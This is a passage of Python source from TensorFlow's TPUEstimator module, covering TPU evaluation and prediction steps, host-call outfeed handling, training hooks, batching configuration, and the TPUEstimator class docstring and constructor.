infeed dequeue channel.
Returns:
A tuple of (eval_fn, host_calls, captured scaffold_fn, captured eval
hooks). The eval_fn represents the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return tf.math.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of (predict_fn, host_calls, captured scaffold_fn, captured
prediction hooks). The predict_fn represents the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Add validation for the prediction dictionary.
# TODO(xiejw): Add support for a single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, tf.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Make deep copies of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`. As we are running on the CPU, escape
# the TPUInferenceContext.
graph_context = tf.compat.v1.get_default_graph(
)._get_control_flow_context()
try:
if isinstance(graph_context, tpu._TPUInferenceContext):
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context.outer_context)
return estimator_spec.as_estimator_spec()
finally:
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context)
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator. '
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
tf.compat.v1.logging.warn(
'EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx, outfeed_every_n_steps=1):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
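# Enqueue from logical core 0 so there is exactly one outfeed enqueue per
# replica, matching the single dequeue performed per replica on the host.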
with tf.compat.v1.device(tf.compat.v1.tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [
tf.compat.v1.cond(
tf.math.equal(
tf.math.floormod(step, self._outfeed_every_n_steps),
0), lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: tf.no_op())
]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with tf.compat.v1.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
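# Regroup the dequeued tensors by host_call name, preserving the order in
# which they were recorded.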
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
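"""Calls `fn` within a CatchInvalidHostcallFunctions control-flow context."""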
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed that evaluation always happens on a single-host TPU system,
# so place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with tf.compat.v1.device(
self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
# TODO(xiejw): Make the specification of the outfeed combination
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core receiving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with tf.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = tf.identity(dequeue_ops[i][0])
else:
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = tf.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = tf.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(tf.compat.v1.train.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(tf.compat.v1.train.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
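"""Stores `batch_size` for examples/sec and initializes the step counter."""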
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
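"""Computes global_step/sec and examples/sec, then logs and records them."""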
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(
tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
tf.compat.v1.logging.info('global_step/sec: %g', global_step_per_sec)
tf.compat.v1.logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(tf.compat.v1.train.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=100):
"""Creates an BatchConfig instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
100.
Returns:
A BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` gets per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.accuracy(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is a list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as a dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical systems. In addition, due to some
usability issues, for prediction with a small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shut down the TPU system
properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as a return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] = export_output_lib.ClassificationOutput(
classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets the `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (e.g., batching).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, `evaluation_hooks`,
and `prediction_hooks` must not capture any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph, etc. This can
also be used to load checkpoints from the directory into an estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be the same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported. Currently,
export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
embedding_config_spec: Optional EmbeddingConfigSpec instance to support
using TPU embedding.
export_saved_model_api_version: an integer: 1 or 2. 1 corresponds to V1,
2 corresponds to V2. (Defaults to V1). With
V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp() for
user; while in v2, user is expected to add rewrite(),
TPUPartitionedCallOp() etc in their model_fn. A helper function
`inference_on_tpu` is provided for V2. brn_tpu_estimator.py includes
examples for both versions i.e. TPUEstimatorExportTest and
TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training not in (
tpu_config.InputPipelineConfig.PER_HOST_V1,
tpu_config.InputPipelineConfig.PER_HOST_V2)):
raise ValueError('Only PER_HOST_V1 and PER_HOST_V2 are supported when '
'using TPU Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
self._embedding_from_feature_columns = (
embedding_config_spec.feature_columns is not None)
if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
embedding_config_spec.partition_strategy == 'mod'):
raise ValueError('Mod sharding of embedding tables not supported on '
'CPU.')
_tpu_estimator_gauge.get_cell().set(True)
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to prevent TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Pass non-None params, as the wrapped model_fn expects them.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. A trade-off
# avoiding API change on the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(
math.ceil(
float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
